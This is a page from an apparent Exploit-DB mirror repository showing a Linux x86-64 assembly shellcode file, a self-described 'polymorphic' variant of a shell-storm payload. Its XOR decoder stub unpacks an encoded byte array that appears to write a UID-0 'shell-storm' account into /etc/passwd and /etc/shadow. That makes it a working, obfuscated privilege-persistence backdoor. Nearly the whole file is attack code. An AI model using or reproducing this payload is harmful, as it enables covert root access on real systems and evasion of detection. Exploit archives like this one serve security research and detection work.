bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/shellcodes/linux_x86-64/43561.asm
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

50 lines
No EOL
2.8 KiB
NASM
Raw Permalink Blame History

; ===================================================================
; "Polymorphic" version of shellcode at:
; http://shell-storm.org/shellcode/files/shellcode-658.php
; Author: SLAE64-1351 (Keyman)
; Date: 21/09/2014
;
; Length: 273 bytes (got shorter by 117 bytes)
;
; The original code was optimized. This way it became 240 bytes long.
; Each byte of the optimized shellcode was XOR'ed with 0xDE. The
; result was dumped as the encoded shellcode below. A decoder stub
; was implemented to XOR each byte of "shellcode" with 0xDE. (except
; the first byte). After the decoding is finished execution is
; passed to the original (decoded) shellcode.
;
; ===================================================================
section .text
global _start
_start:
; -------------------------------------------------------------------
; Shellcode decoder stub
; -------------------------------------------------------------------
push 1
pop rcx
begin:
cmp rcx, 1
je begin_sc
pop rdi ; rdi points to the shellcode
push byte 0x78
pop rcx
add rcx, 0x77
decode:
xor byte [rdi+rcx], 0xDE
loop decode
jmp shellcode
begin_sc:
dec rcx
call begin
; -------------------------------------------------------------------
; Encoded shellcode
; -------------------------------------------------------------------
shellcode:
sc: db 0xEB, 0xBB, 0x81, 0x5E, 0xB1, 0xD5, 0x9F, 0x5E, 0xB1, 0xC6, 0x9F, 0xB4, 0xDC, 0x87, 0xB4, 0xDC, 0x86, 0x8E, 0x8E, 0x80, 0x84, 0xB8, 0x5F, 0x18, 0xD1, 0xDA, 0xB8, 0x5F, 0x1C, 0x5C, 0xDC, 0x8F, 0xD1, 0xDB, 0x87, 0x97, 0x49, 0x96, 0x5D, 0x19, 0xD3, 0x3C, 0x3D, 0x96, 0x21, 0x11, 0x89, 0x80, 0x8E, 0x81, 0xB4, 0xDC, 0x87, 0xB4, 0xF0, 0x9F, 0x80, 0xB4, 0xDF, 0x86, 0x9F, 0x88, 0x84, 0x8F, 0xD1, 0xDB, 0x87, 0x96, 0x5D, 0x18, 0xEE, 0x97, 0x59, 0x21, 0xB4, 0xE5, 0x9F, 0x80, 0x3C, 0x37, 0xB4, 0xDC, 0x87, 0xB4, 0xDD, 0x86, 0x8F, 0xD1, 0xDB, 0x87, 0x97, 0x59, 0x21, 0x3C, 0x2A, 0x96, 0xEF, 0x21, 0xB4, 0xE2, 0x86, 0xD1, 0xDB, 0x36, 0x48, 0x21, 0x21, 0x21, 0xF1, 0xBB, 0xAA, 0xBD, 0xF1, 0xAE, 0xBF, 0xAD, 0xAD, 0xA9, 0xBA, 0x9F, 0xF1, 0xF1, 0xBB, 0xAA, 0xBD, 0xF1, 0xAD, 0xB6, 0xBF, 0xBA, 0xB1, 0xA9, 0x9F, 0xAD, 0xB6, 0xBB, 0xB2, 0xB2, 0xF3, 0xAD, 0xAA, 0xB1, 0xAC, 0xB3, 0xE4, 0xA6, 0xE4, 0xEE, 0xE4, 0xEE, 0xE4, 0xAD, 0xB6, 0xBB, 0xB2, 0xB2, 0xF3, 0xAD, 0xAA, 0xB1, 0xAC, 0xB3, 0xF0, 0xB1, 0xAC, 0xB9, 0xE4, 0xF1, 0xE4, 0xF1, 0xBC, 0xB7, 0xB0, 0xF1, 0xBC, 0xBF, 0xAD, 0xB6, 0xD4, 0xAD, 0xB6, 0xAD, 0xB6, 0xBB, 0xB2, 0xB2, 0xF3, 0xAD, 0xAA, 0xB1, 0xAC, 0xB3, 0xE4, 0xFA, 0xEF, 0xFA, 0xAC, 0xBB, 0x89, 0x9B, 0xE9, 0x99, 0x93, 0xEF, 0xFA, 0xBF, 0xA6, 0xBB, 0x93, 0xB9, 0xE8, 0x92, 0x8A, 0xAD, 0xF1, 0x8E, 0xBA, 0x8D, 0xB9, 0xBD, 0x98, 0x84, 0xEE, 0x8B, 0xED, 0x93, 0xF1, 0xE4, 0xEF, 0xEA, 0xE9, 0xE9, 0xE6, 0xE4, 0xE4, 0xE4, 0xE4, 0xE4, 0xE4, 0xD4
Reference in a new issue View git blame Copy permalink